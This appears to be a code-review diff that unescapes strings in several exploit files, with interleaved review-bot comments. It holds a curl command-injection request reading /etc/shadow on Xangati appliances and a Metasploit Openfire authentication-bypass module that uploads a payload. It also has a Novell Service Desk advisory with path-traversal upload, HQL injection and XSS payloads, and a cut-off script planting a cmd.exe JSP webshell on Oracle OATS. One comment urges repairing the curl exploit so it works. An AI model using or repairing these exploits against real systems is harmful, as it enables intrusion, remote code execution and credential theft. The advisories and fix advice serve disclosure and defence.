}
|
||||
xsendftpcmd(fd, \"USER\", user);
|
||||
xsendftpcmd(fd, "USER", user);
|
||||
xrecieveall(fd, reply, sizeof(reply));
|
||||
if (verbose)
|
||||
printf(\"%s\\n\", reply);
|
||||
xsendftpcmd(fd, \"PASS\", password);
|
||||
printf("%s\n", reply);
|
||||
xsendftpcmd(fd, "PASS", password);
|
||||
xrecieveall(fd, reply, sizeof(reply));
|
||||
if (verbose)
|
||||
printf(\"%s\\n\", reply);
|
||||
printf("%s\n", reply);
|
||||
|
||||
if (reply[0] != \'2\') {
|
||||
printf(\"Login failed.\\n\");
|
||||
if (reply[0] != '2') {
|
||||
printf("Login failed.\n");
|
||||
exit(-1);
|
||||
}
|
||||
}
|
||||
|
@ -433,10 +433,10 @@ xsendftpcmd(int fd, char *command, char *param)
|
|||
xsend(fd, command);
|
||||
|
||||
if (param != NULL) {
|
||||
xsend(fd, \" \");
|
||||
xsend(fd, " ");
|
||||
xsend(fd, param);
|
||||
}
|
||||
xsend(fd, \"\\r\\n\");
|
||||
xsend(fd, "\r\n");
|
||||
}
|
||||
|
||||
|
||||
|
@ -445,7 +445,7 @@ xsend(int fd, char *buf)
|
|||
{
|
||||
|
||||
if (send(fd, buf, strlen(buf), 0) != strlen(buf)) {
|
||||
perror(\"send\");
|
||||
perror("send");
|
||||
exit(-1);
|
||||
}
|
||||
}
|
||||
|
@ -462,7 +462,7 @@ xrecieveall(int fd, char *buf, int size)
|
|||
memset(buf, 0, size);
|
||||
do {
|
||||
xrecieve(fd, buf, size);
|
||||
} while (buf[3] == \'-\');
|
||||
} while (buf[3] == '-');
|
||||
}
|
||||
/* recieves a line from the ftpd */
|
||||
void
|
||||
|
@ -475,25 +475,25 @@ xrecieve(int fd, char *buf, int size)
|
|||
|
||||
while (buf < end) {
|
||||
if (read(fd, buf, 1) != 1) {
|
||||
perror(\"read\"); /* XXX */
|
||||
perror("read"); /* XXX */
|
||||
exit(-1);
|
||||
}
|
||||
if (buf[0] == \'\\n\') {
|
||||
buf[0] = \'\\0\';
|
||||
if (buf[0] == '\n') {
|
||||
buf[0] = '\0';
|
||||
return;
|
||||
}
|
||||
if (buf[0] != \'\\r\') {
|
||||
if (buf[0] != '\r') {
|
||||
buf++;
|
||||
}
|
||||
}
|
||||
buf--;
|
||||
while (read(fd, buf, 1) == 1) {
|
||||
if (buf[0] == \'\\n\') {
|
||||
buf[0] = \'\\0\';
|
||||
if (buf[0] == '\n') {
|
||||
buf[0] = '\0';
|
||||
return;
|
||||
}
|
||||
}
|
||||
perror(\"read\"); /* XXX */
|
||||
perror("read"); /* XXX */
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
|
|
|
@ -6,7 +6,7 @@ An attacker may leverage this issue to execute arbitrary commands in the context
|
|||
|
||||
Xangati XSR prior to 11 and XNR prior to 7 are vulnerable.
|
||||
|
||||
curl -i -s -k -X \'POST\' \\
|
||||
-H \'Content-Type: application/x-www-form-urlencoded\' -H \'User-Agent: Java/1.7.0_25\' \\
|
||||
--data-binary $\'key=validkey&falconConfig=validateTest&path=%2Fvar%2Ftmp%2F¶ms=gui_input_test.pl¶ms=-p+localhost;CMD%3d$\\\'cat\\\\x20/etc/shadow\\\';$CMD;+YES\' \\
|
||||
\'hxxps://www.example.com/servlet/Installer\'
|
||||
curl -i -s -k -X 'POST' \
|
||||
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
|
||||
--data-binary $'key=validkey&falconConfig=validateTest&path=%2Fvar%2Ftmp%2F¶ms=gui_input_test.pl¶ms=-p+localhost;CMD%3d$\'cat\\x20/etc/shadow\';$CMD;+YES' \
|
||||
'hxxps://www.example.com/servlet/Installer'
|
||||
|
|
|
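Review bot: two things in this hunk. First, `¶ms=gui_input_test.pl` and `¶ms=-p+localhost` are `&params=` with `&para` decoded to `¶` by an earlier HTML-entity pass, in both the old and the new text; the stored curl command therefore sends the wrong parameter names and should be repaired while the file is touched. Second, the new line `$'...CMD%3d$\'cat\\x20/etc/shadow\';$CMD;+YES'` is correct as unescaped: inside bash's `$'...'` quoting, `\'` is a literal single quote and `\\x20` becomes `\x20`, so the remote shell receives `CMD=$'cat\x20/etc/shadow'` and expands it to `cat /etc/shadow`; removing one more backslash here would break the payload.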
@ -5,8 +5,8 @@
|
|||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require \'msf/core\'
|
||||
require \'rex/zip\'
|
||||
require 'msf/core'
|
||||
require 'rex/zip'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
@ -18,8 +18,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
\'Name\' => \'Openfire Admin Console Authentication Bypass\',
|
||||
\'Description\' => %q{
|
||||
'Name' => 'Openfire Admin Console Authentication Bypass',
|
||||
'Description' => %q{
|
||||
This module exploits an authentication bypass vulnerability in the administration
|
||||
console of Openfire servers. By using this vulnerability it is possible to
|
||||
upload/execute a malicious Openfire plugin on the server and execute arbitrary Java
|
||||
|
@ -29,102 +29,102 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
the server in some kind of unstable state, making re-exploitation difficult. You might
|
||||
want to do this manually.
|
||||
},
|
||||
\'Author\' =>
|
||||
'Author' =>
|
||||
[
|
||||
\'Andreas Kurtz\', # Vulnerability discovery
|
||||
\'h0ng10\' # Metasploit module
|
||||
'Andreas Kurtz', # Vulnerability discovery
|
||||
'h0ng10' # Metasploit module
|
||||
],
|
||||
\'License\' => MSF_LICENSE,
|
||||
\'References\' =>
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ \'CVE\', \'2008-6508\' ],
|
||||
[ \'OSVDB\', \'49663\' ],
|
||||
[ \'BID\', \'32189\' ],
|
||||
[ \'EDB\', \'7075\' ],
|
||||
[ \'URL\', \'http://community.igniterealtime.org/thread/35874\' ]
|
||||
[ 'CVE', '2008-6508' ],
|
||||
[ 'OSVDB', '49663' ],
|
||||
[ 'BID', '32189' ],
|
||||
[ 'EDB', '7075' ],
|
||||
[ 'URL', 'http://community.igniterealtime.org/thread/35874' ]
|
||||
],
|
||||
\'DisclosureDate\' => \'Nov 10 2008\',
|
||||
\'Privileged\' => true,
|
||||
\'Platform\' => [\'java\', \'win\', \'linux\' ],
|
||||
\'Stance\' => Msf::Exploit::Stance::Aggressive,
|
||||
\'Targets\' =>
|
||||
'DisclosureDate' => 'Nov 10 2008',
|
||||
'Privileged' => true,
|
||||
'Platform' => ['java', 'win', 'linux' ],
|
||||
'Stance' => Msf::Exploit::Stance::Aggressive,
|
||||
'Targets' =>
|
||||
[
|
||||
#
|
||||
# Java version
|
||||
#
|
||||
[ \'Java Universal\',
|
||||
[ 'Java Universal',
|
||||
{
|
||||
\'Arch\' => ARCH_JAVA,
|
||||
\'Platform\' => \'java\'
|
||||
'Arch' => ARCH_JAVA,
|
||||
'Platform' => 'java'
|
||||
}
|
||||
],
|
||||
#
|
||||
# Platform specific targets
|
||||
#
|
||||
[ \'Windows x86 (Native Payload)\',
|
||||
[ 'Windows x86 (Native Payload)',
|
||||
{
|
||||
\'Platform\' => \'win\',
|
||||
\'Arch\' => ARCH_X86,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
}
|
||||
],
|
||||
[ \'Linux x86 (Native Payload)\',
|
||||
[ 'Linux x86 (Native Payload)',
|
||||
{
|
||||
\'Platform\' => \'linux\',
|
||||
\'Arch\' => ARCH_X86,
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X86,
|
||||
}
|
||||
]
|
||||
],
|
||||
\'DefaultTarget\' => 0,
|
||||
'DefaultTarget' => 0,
|
||||
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(9090),
|
||||
OptString.new(\'TARGETURI\', [true, \'The base path to the web application\', \'/\']),
|
||||
OptString.new(\'PLUGINNAME\', [ false, \'Openfire plugin base name, (default: random)\' ]),
|
||||
OptString.new(\'PLUGINAUTHOR\',[ false, \'Openfire plugin author, (default: random)\' ]),
|
||||
OptString.new(\'PLUGINDESC\', [ false, \'Openfire plugin description, (default: random)\' ]),
|
||||
OptBool.new(\'REMOVE_PLUGIN\', [ false, \'Try to remove the plugin after installation\', false ]),
|
||||
OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),
|
||||
OptString.new('PLUGINNAME', [ false, 'Openfire plugin base name, (default: random)' ]),
|
||||
OptString.new('PLUGINAUTHOR',[ false, 'Openfire plugin author, (default: random)' ]),
|
||||
OptString.new('PLUGINDESC', [ false, 'Openfire plugin description, (default: random)' ]),
|
||||
OptBool.new('REMOVE_PLUGIN', [ false, 'Try to remove the plugin after installation', false ]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
base = target_uri.path
|
||||
base << \'/\' if base[-1, 1] != \'/\'
|
||||
base << '/' if base[-1, 1] != '/'
|
||||
|
||||
path = \"#{base}login.jsp\"
|
||||
path = "#{base}login.jsp"
|
||||
res = send_request_cgi(
|
||||
{
|
||||
\'uri\' => path
|
||||
'uri' => path
|
||||
})
|
||||
|
||||
if (not res) or (res.code != 200)
|
||||
print_error(\"Unable to make a request to: #{path}\")
|
||||
print_error("Unable to make a request to: #{path}")
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
versioncheck = res.body =~ /Openfire, \\D*: (\\d)\\.(\\d).(\\d)\\s*<\\/div>/
|
||||
versioncheck = res.body =~ /Openfire, \D*: (\d)\.(\d).(\d)\s*<\/div>/
|
||||
|
||||
if versioncheck.nil? then
|
||||
print_error(\"Unable to detect Openfire version\")
|
||||
print_error("Unable to detect Openfire version")
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
print_status(\"Detected version: #{$1}.#{$2}.#{$3}\")
|
||||
version = \"#{$1}#{$2}#{$3}\".to_i
|
||||
print_status("Detected version: #{$1}.#{$2}.#{$3}")
|
||||
version = "#{$1}#{$2}#{$3}".to_i
|
||||
|
||||
return Exploit::CheckCode::Safe if version > 360
|
||||
|
||||
# Just to be sure, try to access the log page
|
||||
path = \"#{base}setup/setup-/../../log.jsp\"
|
||||
path = "#{base}setup/setup-/../../log.jsp"
|
||||
res = send_request_cgi(
|
||||
{
|
||||
\'uri\' => path
|
||||
'uri' => path
|
||||
})
|
||||
|
||||
if (not res) or (res.code != 200)
|
||||
print_error(\"Failed: Error requesting #{path}\")
|
||||
print_error("Failed: Error requesting #{path}")
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
|
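Review bot: the regex unescape from `/Openfire, \\D*: (\\d)\\.(\\d).(\\d)\\s*<\\/div>/` to `/Openfire, \D*: (\d)\.(\d).(\d)\s*<\/div>/` is correct for Ruby source. In the module itself rather than in this change, note that the separator between the second and third capture is a bare `.` (any character) while the first is `\.`, and that each version component is a single `\d`, so a `3.6.10`-style string does not match and `check` returns `Unknown`. Not something this commit needs to fix, but worth a follow-up since the `version > 360` comparison that follows is what decides `Safe`.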
@ -133,83 +133,83 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def get_plugin_jar(plugin_name)
|
||||
files = [
|
||||
[ \"logo_large.gif\" ],
|
||||
[ \"logo_small.gif\" ],
|
||||
[ \"readme.html\" ],
|
||||
[ \"changelog.html\" ],
|
||||
[ \"lib\", \"plugin-metasploit.jar\" ]
|
||||
[ "logo_large.gif" ],
|
||||
[ "logo_small.gif" ],
|
||||
[ "readme.html" ],
|
||||
[ "changelog.html" ],
|
||||
[ "lib", "plugin-metasploit.jar" ]
|
||||
]
|
||||
|
||||
jar = Rex::Zip::Jar.new
|
||||
jar.add_files(files, File.join(Msf::Config.install_root, \"data\", \"exploits\", \"CVE-2008-6508\"))
|
||||
jar.add_files(files, File.join(Msf::Config.install_root, "data", "exploits", "CVE-2008-6508"))
|
||||
|
||||
plugin_author = datastore[\'PLUGINAUTHOR\'] || rand_text_alphanumeric(8+rand(8))
|
||||
plugin_desc = datastore[\'PLUGINDESC\'] || rand_text_alphanumeric(8+rand(8))
|
||||
plugin_author = datastore['PLUGINAUTHOR'] || rand_text_alphanumeric(8+rand(8))
|
||||
plugin_desc = datastore['PLUGINDESC'] || rand_text_alphanumeric(8+rand(8))
|
||||
|
||||
plugin_xml = File.open(File.join(Msf::Config.install_root, \"data\", \"exploits\", \"CVE-2008-6508\", \"plugin.xml\"), \"rb\") {|fd| fd.read() }
|
||||
plugin_xml = File.open(File.join(Msf::Config.install_root, "data", "exploits", "CVE-2008-6508", "plugin.xml"), "rb") {|fd| fd.read() }
|
||||
plugin_xml.gsub!(/PLUGINNAME/, plugin_name)
|
||||
plugin_xml.gsub!(/PLUGINDESCRIPTION/, plugin_desc)
|
||||
plugin_xml.gsub!(/PLUGINAUTHOR/, plugin_author)
|
||||
|
||||
jar.add_file(\"plugin.xml\", plugin_xml)
|
||||
jar.add_file("plugin.xml", plugin_xml)
|
||||
|
||||
jar
|
||||
end
|
||||
|
||||
def exploit
|
||||
base = target_uri.path
|
||||
base << \'/\' if base[-1, 1] != \'/\'
|
||||
base << '/' if base[-1, 1] != '/'
|
||||
|
||||
plugin_name = datastore[\'PLUGINNAME\'] || rand_text_alphanumeric(8+rand(8))
|
||||
plugin_name = datastore['PLUGINNAME'] || rand_text_alphanumeric(8+rand(8))
|
||||
plugin = get_plugin_jar(plugin_name)
|
||||
|
||||
arch = target.arch
|
||||
plat = [Msf::Module::PlatformList.new(target[\'Platform\']).platforms[0]]
|
||||
plat = [Msf::Module::PlatformList.new(target['Platform']).platforms[0]]
|
||||
|
||||
if (p = exploit_regenerate_payload(plat, arch)) == nil
|
||||
print_error(\"Failed to regenerate payload\")
|
||||
print_error("Failed to regenerate payload")
|
||||
return
|
||||
end
|
||||
|
||||
plugin.add_file(\"lib/#{rand_text_alphanumeric(8)}.jar\", payload.encoded_jar.pack)
|
||||
plugin.add_file("lib/#{rand_text_alphanumeric(8)}.jar", payload.encoded_jar.pack)
|
||||
plugin.build_manifest
|
||||
|
||||
# Upload the plugin to the server
|
||||
print_status(\"Uploading plugin #{plugin_name} to the server\")
|
||||
print_status("Uploading plugin #{plugin_name} to the server")
|
||||
boundary = rand_text_alphanumeric(6)
|
||||
|
||||
data = \"--#{boundary}\\r\\nContent-Disposition: form-data; name=\\\"uploadfile\\\"; \"
|
||||
data << \"filename=\\\"#{plugin_name}.jar\\\"\\r\\nContent-Type: application/java-archive\\r\\n\\r\\n\"
|
||||
data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"uploadfile\"; "
|
||||
data << "filename=\"#{plugin_name}.jar\"\r\nContent-Type: application/java-archive\r\n\r\n"
|
||||
data << plugin.pack
|
||||
data << \"\\r\\n--#{boundary}--\"
|
||||
data << "\r\n--#{boundary}--"
|
||||
|
||||
res = send_request_cgi({
|
||||
\'uri\' => \"#{base}setup/setup-/../../plugin-admin.jsp?uploadplugin\",
|
||||
\'method\' => \'POST\',
|
||||
\'data\' => data,
|
||||
\'headers\' =>
|
||||
'uri' => "#{base}setup/setup-/../../plugin-admin.jsp?uploadplugin",
|
||||
'method' => 'POST',
|
||||
'data' => data,
|
||||
'headers' =>
|
||||
{
|
||||
\'Content-Type\' => \'multipart/form-data; boundary=\' + boundary,
|
||||
\'Content-Length\' => data.length,
|
||||
\'Cookie\' => \"JSESSIONID=#{rand_text_numeric(13)}\",
|
||||
'Content-Type' => 'multipart/form-data; boundary=' + boundary,
|
||||
'Content-Length' => data.length,
|
||||
'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}",
|
||||
}
|
||||
})
|
||||
|
||||
|
||||
print_error(\"Warning: got no response from the upload, continuing...\") if !res
|
||||
print_error("Warning: got no response from the upload, continuing...") if !res
|
||||
|
||||
# Delete the uploaded JAR file
|
||||
if datastore[\'REMOVE_PLUGIN\']
|
||||
print_status(\"Deleting plugin #{plugin_name} from the server\")
|
||||
if datastore['REMOVE_PLUGIN']
|
||||
print_status("Deleting plugin #{plugin_name} from the server")
|
||||
res = send_request_cgi({
|
||||
\'uri\' => \"#{base}setup/setup-/../../plugin-admin.jsp?deleteplugin=#{plugin_name.downcase}\",
|
||||
\'headers\' =>
|
||||
'uri' => "#{base}setup/setup-/../../plugin-admin.jsp?deleteplugin=#{plugin_name.downcase}",
|
||||
'headers' =>
|
||||
{
|
||||
\'Cookie\' => \"JSESSIONID=#{rand_text_numeric(13)}\",
|
||||
'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}",
|
||||
}
|
||||
})
|
||||
if not res
|
||||
print_error(\"Error deleting the plugin #{plugin_name}. You might want to do this manually.\")
|
||||
print_error("Error deleting the plugin #{plugin_name}. You might want to do this manually.")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
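Review bot: `'Content-Length' => data.length`, kept unchanged in this hunk, states a character count where a byte count is meant; `data` is built from string literals and then appended with `plugin.pack`, the raw JAR bytes, so it only equals the wire length because Ruby's encoding negotiation happens to make the result binary. `data.bytesize` states the intent, and since Rex's HTTP client derives Content-Length from `'data'` on its own, the explicit header can simply be dropped. The change itself (`\'uri\'` to `'uri'`, `\\r\\n` to `\r\n`) restores the file to the form Ruby actually parses.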
@ -4,11 +4,11 @@
|
|||
Disclosure: 30/03/2016 / Last updated: 10/04/2016
|
||||
|
||||
>> Background on the affected products:
|
||||
\"Novell Service Desk 7.1.0 is a complete service management solution that allows you to easily monitor and solve services issues so that there is minimal disruption to your organization, which allows users to focus on the core business. Novell Service Desk provides an online support system to meet the service requirements of all your customers, administrators, supervisors, and technicians\"
|
||||
"Novell Service Desk 7.1.0 is a complete service management solution that allows you to easily monitor and solve services issues so that there is minimal disruption to your organization, which allows users to focus on the core business. Novell Service Desk provides an online support system to meet the service requirements of all your customers, administrators, supervisors, and technicians"
|
||||
|
||||
|
||||
>> Summary:
|
||||
Novell Service Desk has several vulnerabilities including a file upload function that can be exploited to achieve authenticated remote code execution. The product appears to be a rebranded version of Absolute Service (another help desk system). The latter has not been tested but it is likely to contain the same vulnerabilities as Novell Service Desk. The Google dork for this application is inurl:\"LiveTime/WebObjects\". Version 7.2 and above now appear to be branded as \"Micro Focus Service Desk\".
|
||||
Novell Service Desk has several vulnerabilities including a file upload function that can be exploited to achieve authenticated remote code execution. The product appears to be a rebranded version of Absolute Service (another help desk system). The latter has not been tested but it is likely to contain the same vulnerabilities as Novell Service Desk. The Google dork for this application is inurl:"LiveTime/WebObjects". Version 7.2 and above now appear to be branded as "Micro Focus Service Desk".
|
||||
Advisories for these vulnerabilities can be found in the Micro Focus site at [1], [2], [3] and [4].
|
||||
|
||||
|
||||
|
@ -32,7 +32,7 @@ Content-Type: multipart/form-data; boundary=---------------------------247747071
|
|||
Content-Length: 533
|
||||
|
||||
-----------------------------2477470717121
|
||||
Content-Disposition: form-data; name=\"0.53.19.0.2.7.0.3.0.0.1.1.1.4.0.0.23\"; filename=\"../../srv/tomcat6/webapps/LiveTime/bla5.jsp\"
|
||||
Content-Disposition: form-data; name="0.53.19.0.2.7.0.3.0.0.1.1.1.4.0.0.23"; filename="../../srv/tomcat6/webapps/LiveTime/bla5.jsp"
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
<HTML>
|
||||
|
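Review bot: the `filename="../../srv/tomcat6/webapps/LiveTime/bla5.jsp"` value in the `Content-Disposition` line is the whole finding: the upload handler honours directory components in a client-supplied filename, and with a JSP extension the file lands where Tomcat will execute it. The server-side fix is to take the basename of the submitted name (or generate the stored name), reject or rename executable extensions, and keep the upload directory outside the webapp root. Unescaping the quotes is right here because the line is quoted HTTP request text, not code.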
@ -45,7 +45,7 @@ Content-Type: application/octet-stream
|
|||
</BODY>
|
||||
</HTML>
|
||||
-----------------------------2477470717121
|
||||
Content-Disposition: form-data; name=\"ButtonUpload\"
|
||||
Content-Disposition: form-data; name="ButtonUpload"
|
||||
|
||||
Upload
|
||||
-----------------------------2477470717121--
|
||||
|
@ -102,7 +102,7 @@ Affected versions:
|
|||
GET /LiveTime/WebObjects/LiveTime.woa/wa/DownloadAction/downloadFile?attachmentId=1&entityName=<HQL injection here>
|
||||
|
||||
Input is passed directly to Hibernate (line 125 of DownloadAction.class):
|
||||
List<?> attachments = ((com.livetime.Session)session()).getDbSession().createQuery(new StringBuilder().append(\"from \").append(hasEn).append(\" as attach where attach.attachmentId = \").append(hasId.intValue()).toString()).list();
|
||||
List<?> attachments = ((com.livetime.Session)session()).getDbSession().createQuery(new StringBuilder().append("from ").append(hasEn).append(" as attach where attach.attachmentId = ").append(hasId.intValue()).toString()).list();
|
||||
|
||||
hasEn is entityName (string) and hasId is attachmentId (integer)
|
||||
|
||||
|
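Review bot: on the `createQuery(new StringBuilder().append("from ").append(hasEn) ...)` line, `hasEn` (the `entityName` query parameter) is concatenated into the HQL entity position, which cannot be bound as a query parameter, so the only fix is validation: compare `entityName` against an allowlist of the entity classes the download action is meant to serve and reject anything else before the query string is built. `hasId.intValue()` is already safe because it is an integer. The `\"from \"` to `"from "` change only fixes storage escaping in quoted decompiled code.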
@ -123,7 +123,7 @@ a)
|
|||
In the customer portal, clicking the user name will allow you to edit your display name.
|
||||
The fields tf_aClientFirstName and tf_aClientLastName are also vulnerable to stored XSS. Other fields might be vulnerable but have not been tested.
|
||||
Example:
|
||||
tf_aClientFirstName=Jos\"><script>alert(1)</script>e&tf_aClientEmail=aa%40aa.bb&tf_aClientLastName=\"><script>alert(2)</script>Guestaa
|
||||
tf_aClientFirstName=Jos"><script>alert(1)</script>e&tf_aClientEmail=aa%40aa.bb&tf_aClientLastName="><script>alert(2)</script>Guestaa
|
||||
|
||||
This can be used to attack an administrator or any other management user, as the name will be changed globally. If an administrator sees the list of users an alert box will pop up.
|
||||
|
||||
|
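Review bot: the `tf_aClientFirstName=Jos"><script>alert(1)</script>e` example shows the display name is reflected into an HTML attribute context without encoding, and the following line says an administrator viewing the user list triggers it, so the fix is output encoding at every render point (HTML entity encoding for attribute and text contexts via the framework's escaping output binding or template auto-escape), not input filtering on this one form. The same comment applies to the forum, organizational unit and vendor fields in the following hunks.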
@ -131,7 +131,7 @@ b)
|
|||
In the Forums the content section is vulnerable when creating a new topic.
|
||||
The affected parameter is ta_selectedTopicContent.
|
||||
Example:
|
||||
tf_selectedTopicTitle=aaaaa&ta_selectedTopicContent=\"><script>alert(2)</script>&ButtonSave=Save
|
||||
tf_selectedTopicTitle=aaaaa&ta_selectedTopicContent="><script>alert(2)</script>&ButtonSave=Save
|
||||
|
||||
The alert box will pop up when you view the topic.
|
||||
|
||||
|
@ -141,16 +141,16 @@ Example:
|
|||
POST /LiveTime/WebObjects/LiveTime.woa/wo/18.0.53.21.0.4.1.3.0.1 HTTP/1.1
|
||||
|
||||
-----------------------------3162880314525
|
||||
Content-Disposition: form-data; name=\"tf_orgUnitName\"
|
||||
Content-Disposition: form-data; name="tf_orgUnitName"
|
||||
|
||||
\"><script>alert(1)</script>
|
||||
"><script>alert(1)</script>
|
||||
|
||||
The alert box will pop up when you view the Organizational Units page and possibly in other pages.
|
||||
|
||||
d)
|
||||
In Configuration -> Vendors, the manufacturer name, address and city parameters are vulnerable when you are creating a new Vendor.
|
||||
Example:
|
||||
tf_aManufacturerFullName=\"><script>alert(1)</script>&tf_aManufacturerName=\"><script>alert(1)</script>&tf_aManufacturerAddress=\"><script>alert(1)</script>&tf_aManufacturerCity=\"><script>alert(1)</script>&tf_aManufacturerPostalCode=&pu_countryDGDisplayedObjects=WONoSelectionString&tf_aManufacturerPhone=&tf_aManufacturerFax=&tf_aManufacturerUrl=&ButtonSave=Save
|
||||
tf_aManufacturerFullName="><script>alert(1)</script>&tf_aManufacturerName="><script>alert(1)</script>&tf_aManufacturerAddress="><script>alert(1)</script>&tf_aManufacturerCity="><script>alert(1)</script>&tf_aManufacturerPostalCode=&pu_countryDGDisplayedObjects=WONoSelectionString&tf_aManufacturerPhone=&tf_aManufacturerFax=&tf_aManufacturerUrl=&ButtonSave=Save
|
||||
|
||||
Three alert boxes will pop up when you view the Vendor page and possibly in other pages.
|
||||
|
||||
|
|
|
@ -9,19 +9,19 @@
|
|||
import urllib2
|
||||
import urllib
|
||||
|
||||
ip = \'192.168.150.239\'
|
||||
ip = '192.168.150.239'
|
||||
port = 8088
|
||||
|
||||
url = \"http://\" + ip + \":\" + str(port)
|
||||
url = "http://" + ip + ":" + str(port)
|
||||
#bypass authentication
|
||||
url = url+\"/olt/Login.do/../../olt/UploadFileUpload.do\"
|
||||
url = url+"/olt/Login.do/../../olt/UploadFileUpload.do"
|
||||
request = urllib2.Request(url)
|
||||
|
||||
webshell_content=\'\'\'
|
||||
<%@ page import=\"java.util.*,java.io.*\" %>
|
||||
webshell_content='''
|
||||
<%@ page import="java.util.*,java.io.*" %>
|
||||
<%
|
||||
if (request.getParameter(\"{cmd}\") != null) {{
|
||||
Process p = Runtime.getRuntime().exec(\"cmd.exe /c \" + request.getParameter(\"{cmd}\"));
|
||||
if (request.getParameter("{cmd}") != null) {{
|
||||
Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("{cmd}"));
|
||||
OutputStream os = p.getOutputStream();
|
||||
InputStream in = p.getInputStream();
|
||||
DataInputStream dis = new DataInputStream(in);
|
||||
|
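Review bot: the `url+"/olt/Login.do/../../olt/UploadFileUpload.do"` line is the authentication bypass the `#bypass authentication` comment refers to: the access check is applied to the literal request path while the container resolves the `..` segments afterwards, so the protected action is reached under a path the filter never matches. The server-side fix is to apply the filter to the canonicalized path, or to reject any request URI containing dot segments before routing. The `\'` to `'` and `\"` to `"` changes restore valid Python and JSP literals.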
@ -32,65 +32,65 @@ webshell_content=\'\'\'
|
|||
}}
|
||||
}}
|
||||
%>
|
||||
\'\'\'
|
||||
boundary = \"---------------------------7e01e2240a1e\"
|
||||
request.add_header(\'Content-Type\', \"multipart/form-data; boundary=\" + boundary)
|
||||
post_data = \"--\" + boundary + \"\\r\\n\"
|
||||
post_data = post_data + \"Content-Disposition: form-data; name=\\\"storage.extension\\\"\\r\\n\"
|
||||
post_data = post_data + \"\\r\\n.jsp\\r\\n\"
|
||||
post_data = post_data + \"--\" + boundary + \"\\r\\n\"
|
||||
post_data = post_data + \"Content-Disposition: form-data; name=\\\"fileName1\\\"\\r\\n\"
|
||||
post_data = post_data + \"\\r\\nwebshell.jsp\\r\\n\"
|
||||
post_data = post_data + \"--\" + boundary + \"\\r\\n\"
|
||||
post_data = post_data + \"Content-Disposition: form-data; name=\\\"fileName2\\\"\\r\\n\"
|
||||
post_data = post_data + \"\\r\\n\\r\\n\"
|
||||
post_data = post_data + \"--\" + boundary + \"\\r\\n\"
|
||||
post_data = post_data + \"Content-Disposition: form-data; name=\\\"fileName3\\\"\\r\\n\"
|
||||
post_data = post_data + \"\\r\\n\\r\\n\"
|
||||
post_data = post_data + \"--\" + boundary + \"\\r\\n\"
|
||||
post_data = post_data + \"Content-Disposition: form-data; name=\\\"fileName4\\\"\\r\\n\"
|
||||
post_data = post_data + \"\\r\\n\\r\\n\"
|
||||
post_data = post_data + \"--\" + boundary + \"\\r\\n\"
|
||||
post_data = post_data + \"Content-Disposition: form-data; name=\\\"fileType\\\"\\r\\n\"
|
||||
post_data = post_data + \"\\r\\n*\\r\\n\"
|
||||
post_data = post_data + \"--\" + boundary + \"\\r\\n\"
|
||||
post_data = post_data + \"Content-Disposition: form-data; name=\\\"file1\\\"; filename=\\\"webshell.jsp\\\"\\r\\n\"
|
||||
post_data = post_data + \"Content-Type: text/plain\\r\\n\"
|
||||
post_data = post_data + \"\\r\\n\" + webshell_content +\"\\r\\n\"
|
||||
post_data = post_data + \"--\" + boundary + \"\\r\\n\"
|
||||
post_data = post_data + \"Content-Disposition: form-data; name=\\\"storage.repository\\\"\\r\\n\"
|
||||
post_data = post_data + \"\\r\\nDefault\\r\\n\"
|
||||
post_data = post_data + \"--\" + boundary + \"\\r\\n\"
|
||||
post_data = post_data + \"Content-Disposition: form-data; name=\\\"storage.workspace\\\"\\r\\n\"
|
||||
post_data = post_data + \"\\r\\n.\\r\\n\"
|
||||
post_data = post_data + \"--\" + boundary + \"\\r\\n\"
|
||||
post_data = post_data + \"Content-Disposition: form-data; name=\\\"directory\\\"\\r\\n\"
|
||||
post_data = post_data + \"\\r\\n\" + \"../oats\\servers\\AdminServer\\\\tmp\\_WL_user\\oats_ee\\\\1ryhnd\\war\\pages\" +\"\\r\\n\"
|
||||
post_data = post_data + \"--\" + boundary + \"--\"+\"\\r\\n\"
|
||||
'''
|
||||
boundary = "---------------------------7e01e2240a1e"
|
||||
request.add_header('Content-Type', "multipart/form-data; boundary=" + boundary)
|
||||
post_data = "--" + boundary + "\r\n"
|
||||
post_data = post_data + "Content-Disposition: form-data; name=\"storage.extension\"\r\n"
|
||||
post_data = post_data + "\r\n.jsp\r\n"
|
||||
post_data = post_data + "--" + boundary + "\r\n"
|
||||
post_data = post_data + "Content-Disposition: form-data; name=\"fileName1\"\r\n"
|
||||
post_data = post_data + "\r\nwebshell.jsp\r\n"
|
||||
post_data = post_data + "--" + boundary + "\r\n"
|
||||
post_data = post_data + "Content-Disposition: form-data; name=\"fileName2\"\r\n"
|
||||
post_data = post_data + "\r\n\r\n"
|
||||
post_data = post_data + "--" + boundary + "\r\n"
|
||||
post_data = post_data + "Content-Disposition: form-data; name=\"fileName3\"\r\n"
|
||||
post_data = post_data + "\r\n\r\n"
|
||||
post_data = post_data + "--" + boundary + "\r\n"
|
||||
post_data = post_data + "Content-Disposition: form-data; name=\"fileName4\"\r\n"
|
||||
post_data = post_data + "\r\n\r\n"
|
||||
post_data = post_data + "--" + boundary + "\r\n"
|
||||
